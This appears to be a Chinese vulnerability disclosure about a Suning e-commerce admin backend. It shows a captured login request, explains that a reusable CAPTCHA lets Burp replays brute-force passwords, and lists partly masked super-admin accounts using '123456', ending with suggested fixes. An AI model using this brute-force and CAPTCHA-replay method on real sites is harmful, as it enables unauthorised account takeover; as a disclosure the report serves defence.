苏宁易购某系统后台多个超级管理员弱口令(验证码可重复利用)
burp抓包放入自定义字典和常用肉口令进行批量破解
POST /manage/syslogin.aspx?result=4 HTTP/1.1 Host: venus.suning.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://venus.suning.com/manage/syslogin.aspx?result=4 Cookie: SN_xxxxxd=9017; districtId=10106; _snma=1%xxxxxx%7C1417577234034%7C1421400805108%7C20%7C2; idsLoginUserIdLastTime=xxxxx; custno=220xxxxx85; WC_SERVER=6; loginpage=MpepxxxxHhY=; UserLogin=69xxxxxxx539022C2AF4165; _snmc=1; _snsr=xxxxxx7C%7C; _snmb=142140080511090012%7C1421400805130%7C1421400805110%7C1; _snmp=142140080512786059; _snmz=xxxxx%28394%2C249%29 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 195 __VIEWSTATE=%2FwEPDwUKMTYyODc0MDM0MGRkXfpyo4bV534Pvf9X4NdQvUW0dSU%3D&__EVENTVALIDATION=%2FwEWBAKq34fKDgKvruq2CAKyxeCRDwLq%2FpboCGxb3RKjTjMITGXJPO0pW2UYZkkT&UserName=xxx&PassWord=123456&vcode=wy52
虽然登录页面存在验证码,不过通过重发攻击可以直接绕过。
通过返回值和字段长度来判断是否破解成功
****cw*** 123456
****lj*** 123456
****hao** 123456
**han**** 123456
**s****** 123456
***w***** 123456
其他弱口令请自查一下
后台搜素处有注入点,请自查一下
修复方案:
修正验证码绕过问题
加强管理员密码强度